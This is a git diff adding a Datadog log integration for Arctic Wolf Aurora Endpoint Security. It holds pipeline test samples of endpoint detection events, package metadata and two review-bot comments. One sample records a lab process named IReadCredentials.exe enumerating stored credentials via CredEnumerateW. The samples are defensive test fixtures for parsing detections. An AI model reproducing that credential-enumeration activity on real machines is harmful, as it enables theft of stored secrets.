instigating_process_command_line: "C:\\Windows\\system32\\lsass.exe" + instigating_process_file_path: "c:\\windows\\system32\\lsass.exe" + instigating_process_imagefilesha256: "BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F" + instigating_process_name: "lsass.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + security_provider: "SecurityAuditProvider" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + windows_event_id: "4720" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeLogEvent, Event Name: OpticsCaeLogEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security Provider: SecurityAuditProvider, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaePowershellTraceEvent, Event Name: 
OpticsCaePowershellTraceEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, Description: SYSLOG detections - Looking for PowershellTrace get-childitem, Instigating Process Name: powershell.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, Instigating Process Command Line: powershell gwmi -class win32_process, Instigating Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe, Script Block Text: @{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros, Script Block Length: 2583, Payload: None, Payload Length: 0, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - Looking for PowershellTrace get-childitem" + detection_rule_id: "9eb1073c-913f-49ab-9b12-2e5a28dad18d" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "4b199c5c-60dc-4b5c-8dac-86965ba5b051" + event_received_timestamp: "2022-06-28T18:10:43Z" + event_timestamp: "2022-06-28T18:10:39.547Z" + event_type: "OpticsCaePowershellTraceEvent" + evt: + name: "OpticsCaePowershellTraceEvent" + instigating_process_command_line: "powershell gwmi -class win32_process" + instigating_process_file_path: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + instigating_process_imagefilesha256: "DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C" + instigating_process_name: 
"powershell.exe" + instigating_process_owner: "PENTEST//Administrator" + payload: "None" + payload_length: 0 + script_block_length: 2583 + script_block_text: "@{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaePowershellTraceEvent, Event Name: OpticsCaePowershellTraceEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, Description: SYSLOG detections - Looking for PowershellTrace get-childitem, Instigating Process Name: powershell.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, Instigating Process Command Line: powershell gwmi -class win32_process, Instigating Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe, Script Block Text: @{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros, Script Block Length: 2583, Payload: None, Payload Length: 0, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event 
Type: OpticsCaeWmiEvent, Event Name: OpticsCaeWmiEvent, Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, Description: SYSLOG detections - Looking for WmiTrace select, Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: NT AUTHORITY//NETWORK SERVICE, Instigating Process ImageFileSha256: B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: (RIMNET\\jefwilliams), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, Instigating Process Command Line: C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, Instigating Process File Path: c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, Consumer Text Length: 0, Operation: Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress, Operation Length: 80, Device Id: c6246140-bba5-4c55-be02-77300bf91dbc" + result: + custom: + additional_details: "" + consumer_text: "None" + consumer_text_length: 0 + description: "SYSLOG detections - Looking for WmiTrace select" + detection_rule_id: "f83b1ac8-b966-4297-be47-bb893bf23f2d" + device_id: "c6246140-bba5-4c55-be02-77300bf91dbc" + device_last_reported_users: + - "RIMNET\\jefwilliams" + device_name: "JEFWILLIAMS-1" + event_id: "9fa208e5-779d-40b1-b4e2-44c330600396" + event_received_timestamp: "2022-06-28T18:09:57Z" + event_timestamp: "2022-06-28T18:09:55.613Z" + event_type: "OpticsCaeWmiEvent" + evt: + name: "OpticsCaeWmiEvent" + instigating_process_command_line: "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding" + instigating_process_file_path: "c:\\windows\\system32\\wbem\\wmiprvse.exe" + instigating_process_imagefilesha256: "B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15" + instigating_process_name: 
"WmiPrvSE.exe" + instigating_process_owner: "NT AUTHORITY//NETWORK SERVICE" + operation: "Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress" + operation_length: 80 + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E)" + zone_names: "(JeffTesting,Jeff_3.0)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeWmiEvent, Event Name: OpticsCaeWmiEvent, Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, Description: SYSLOG detections - Looking for WmiTrace select, Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: NT AUTHORITY//NETWORK SERVICE, Instigating Process ImageFileSha256: B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: (RIMNET\\jefwilliams), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, Instigating Process Command Line: C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, Instigating Process File Path: c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, Consumer Text Length: 0, Operation: Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress, Operation Length: 80, Device Id: c6246140-bba5-4c55-be02-77300bf91dbc" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Name: OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, 
Severity: High, Description: Test - API Sensor, High priority event, Instigating Process Name: IReadCredentials.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating Process Command Line: IReadCredentials.exe, Instigating Process File Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API Function: CredEnumerateW, API Parameters: Unknown" + result: + custom: + additional_details: "" + api_dll: "Advapi32.dll" + api_function: "CredEnumerateW" + api_parameters: "Unknown" + description: "Test - API Sensor, High priority event" + detection_rule_id: "be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1" + event_received_timestamp: "2022-09-28T14:24:30Z" + event_timestamp: "2022-09-28T14:23:37.384Z" + evt: + name: "OpticsCaeApiEvent" + instigating_process_command_line: "IReadCredentials.exe" + instigating_process_file_path: "c:\\apisensor\\ireadcredentials.exe" + instigating_process_imagefilesha256: "E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56" + instigating_process_name: "IReadCredentials.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(ZoneOne,ZoneTwo)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Name: 
OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, Description: Test - API Sensor, High priority event, Instigating Process Name: IReadCredentials.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating Process Command Line: IReadCredentials.exe, Instigating Process File Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API Function: CredEnumerateW, API Parameters: Unknown"
+ service: "detection-events"
+ status: "critical"
+ tags:
+ - "source:LOGS_SOURCE"
+ timestamp: 1
diff --git a/arctic_wolf_aurora_endpoint_security/changelog.d/1.added b/arctic_wolf_aurora_endpoint_security/changelog.d/1.added
new file mode 100644
index 0000000000000..aa949b47b7b41
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/changelog.d/1.added
@@ -0,0 +1 @@
+Initial Release
\ No newline at end of file
diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py
new file mode 100644
index 0000000000000..1bde5986a04b2
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py
@@ -0,0 +1,4 @@
+# (C) Datadog, Inc. 2025-present
+# All rights reserved
+# Licensed under a 3-clause BSD style license (see LICENSE)
+__version__ = '0.0.1'
diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py
new file mode 100644
index 0000000000000..b408666583b85
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py
@@ -0,0 +1,6 @@
+# (C) Datadog, Inc. 2025-present
+# All rights reserved
+# Licensed under a 3-clause BSD style license (see LICENSE)
+from .__about__ import __version__
+
+__all__ = ['__version__']
diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example
new file mode 100644
index 0000000000000..df4f8b71feef5
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example
@@ -0,0 +1,20 @@
+## Log Section
+##
+## type - required - Type of log input source (tcp / udp / file / windows_event).
+## port / path / channel_path - required - Set port if type is tcp or udp.
+## Set path if type is file.
+## Set channel_path if type is windows_event.
+## source - required - Attribute that defines which integration sent the logs
+## service - required - The name of the service that generates the log.
+## Overrides any `service` defined in the `init_config` section.
+## encoding - optional - For file specifies the file encoding. Default is utf-8. Other
+## possible values are utf-16-le and utf-16-be.
+## tags - optional - Add tags to the collected logs
+##
+## Discover Datadog log collection: https://docs.datadoghq.com/logs/log_collection/
+#
+# logs:
+# - type: file
+# path: /var/log/arctic_wolf_aurora_endpoint_security.log
+# source: arctic_wolf_aurora_endpoint_security
+# service:
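Review bot: The example `source: arctic_wolf_aurora_endpoint_security` in conf.yaml.example does not agree with `"source": "arctic-wolf-aurora-endpoint-security"` declared under `assets.logs` in the manifest.json hunk later in this diff — underscores in one, hyphens in the other. If the manifest value is the name the log pipeline is keyed on, logs shipped with the documented example would presumably not be routed to this integration's pipeline; pick one spelling and use it in both files, e.g. `#     source: arctic_wolf_aurora_endpoint_security` and `"source": "arctic_wolf_aurora_endpoint_security"`. The pipeline test samples earlier in the diff still tag every entry with the `source:LOGS_SOURCE` template placeholder, so they do not settle which spelling is intended and would need the real value as well.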
diff --git a/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md b/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md
new file mode 100644
index 0000000000000..443f3c45e3385
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md
@@ -0,0 +1,41 @@
+# Marketplace Media Carousel Guidelines
+
+## Using the media gallery
+
+Please upload images to use the media gallery. Integrations require a minimum of 3 images. Images should highlight your product, your integration, and a full image of the Datadog integration dashboard. The gallery
+can hold a maximum of 8 pieces of media total, and one of these pieces of media
+can be a video (guidelines and submission steps below). Images should be
+added to your /images directory and referenced in the manifest.json file.
+
+
+## Image and video requirements
+
+### Images
+
+```
+File type : .jpg or .png
+File size : ~500 KB per image, with a max of 1 MB per image
+File dimensions : The image must be between 1440px and 2880px width, with a 16:9 aspect ratio (for example: 1440x810)
+File name : Use only letters, numbers, underscores, and hyphens
+Color mode : RGB
+Color profile : sRGB
+Description : 300 characters maximum
+```
+
+### Video
+
+To display a video in your media gallery, please send our team the zipped file
+or a link to download the video at `marketplace@datadog.com`. In addition,
+please upload a thumbnail image for your video as a part of the pull request.
+Once approved, we will upload the file to Vimeo and provide you with the
+vimeo_id to add to your manifest.json file. Please note that the gallery can
+only hold one video.
+
+```
+File type : MP4 H.264
+File size : Max 1 video; 1 GB maximum size
+File dimensions : The aspect ratio must be exactly 16:9, and the resolution must be 1920x1080 or higher
+File name : partnerName-appName.mp4
+Run time : Recommendation of 60 seconds or less
+Description : 300 characters maximum
+```
diff --git a/arctic_wolf_aurora_endpoint_security/manifest.json b/arctic_wolf_aurora_endpoint_security/manifest.json
new file mode 100644
index 0000000000000..f5bc68ef85745
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/manifest.json
@@ -0,0 +1,44 @@
+{
+ "manifest_version": "2.0.0",
+ "app_uuid": "6cffdd38-a25e-4399-a17e-466f53056bf1",
+ "app_id": "arctic-wolf-aurora-endpoint-security",
+ "display_on_public_website": false,
+ "tile": {
+ "overview": "README.md#Overview",
+ "configuration": "README.md#Setup",
+ "support": "README.md#Support",
+ "changelog": "CHANGELOG.md",
+ "description": "",
+ "title": "Arctic Wolf Aurora Endpoint Security",
+ "media": [],
+ "classifier_tags": [
+ "Supported OS::Linux",
+ "Supported OS::Windows",
+ "Supported OS::macOS",
+ "Category::Log Collection"
+ ]
+ },
+ "assets": {
+ "integration": {
+ "auto_install": true,
+ "source_type_id": 64142936,
+ "source_type_name": "Arctic Wolf Aurora Endpoint Security",
+ "configuration": {
+ "spec": "assets/configuration/spec.yaml"
+ },
+ "events": {
+ "creates_events": false
+ }
+ },
+ "dashboards": {},
+ "logs": {
+ "source": "arctic-wolf-aurora-endpoint-security"
+ }
+ },
+ "author": {
+ "support_email": "help@datadoghq.com",
+ "name": "Datadog",
+ "homepage": "https://www.datadoghq.com",
+ "sales_email": "info@datadoghq.com"
+ }
+}
diff --git a/arctic_wolf_aurora_endpoint_security/metadata.csv b/arctic_wolf_aurora_endpoint_security/metadata.csv
new file mode 100644
index 0000000000000..02cde5e98381e
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/metadata.csv
@@ -0,0 +1 @@
+metric_name,metric_type,interval,unit_name,per_unit_name,description,orientation,integration,short_name,curated_metric,sample_tags
diff --git a/arctic_wolf_aurora_endpoint_security/pyproject.toml b/arctic_wolf_aurora_endpoint_security/pyproject.toml
new file mode 100644
index 0000000000000..2025ab94e6318
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/pyproject.toml
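Review bot: The tile in manifest.json ships with `"description": ""` and `"media": []`, so the integration has no one-line summary for the catalog even though `display_on_public_website` is only `false` for now; a short description of what the log source is (endpoint detection events from Arctic Wolf Aurora, judging by the `detection-events` samples earlier in the diff) should go in before the flag is flipped. The `classifier_tags` list carries only `Category::Log Collection`; for an endpoint-security log source the security category tag, if it is available for this tile, would make it discoverable alongside the other security integrations. These are documentation/metadata gaps rather than functional defects.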
@@ -0,0 +1,59 @@
+[build-system]
+requires = [
+ "hatchling>=0.13.0",
+]
+build-backend = "hatchling.build"
+
+[project]
+name = "datadog-arctic-wolf-aurora-endpoint-security"
+description = "The Arctic Wolf Aurora Endpoint Security check"
+readme = "README.md"
+license = "BSD-3-Clause"
+keywords = [
+ "datadog",
+ "datadog agent",
+ "datadog check",
+ "arctic_wolf_aurora_endpoint_security",
+]
+authors = [
+ { name = "Datadog", email = "packages@datadoghq.com" },
+]
+classifiers = [
+ "Development Status :: 5 - Production/Stable",
+ "Intended Audience :: Developers",
+ "Intended Audience :: System Administrators",
+ "License :: OSI Approved :: BSD License",
+ "Private :: Do Not Upload",
+ "Programming Language :: Python :: 3.13",
+ "Topic :: System :: Monitoring",
+]
+dependencies = [
+ "datadog-checks-base>=37.21.0",
+]
+dynamic = [
+ "version",
+]
+
+[project.optional-dependencies]
+deps = []
+
+[project.urls]
+Source = "https://github.com/DataDog/integrations-core"
+
+[tool.hatch.version]
+path = "datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py"
+
+[tool.hatch.build.targets.sdist]
+include = [
+ "/datadog_checks",
+ "/tests",
+ "/manifest.json",
+]
+
+[tool.hatch.build.targets.wheel]
+include = [
+ "/datadog_checks/arctic_wolf_aurora_endpoint_security",
+]
+dev-mode-dirs = [
+ ".",
+]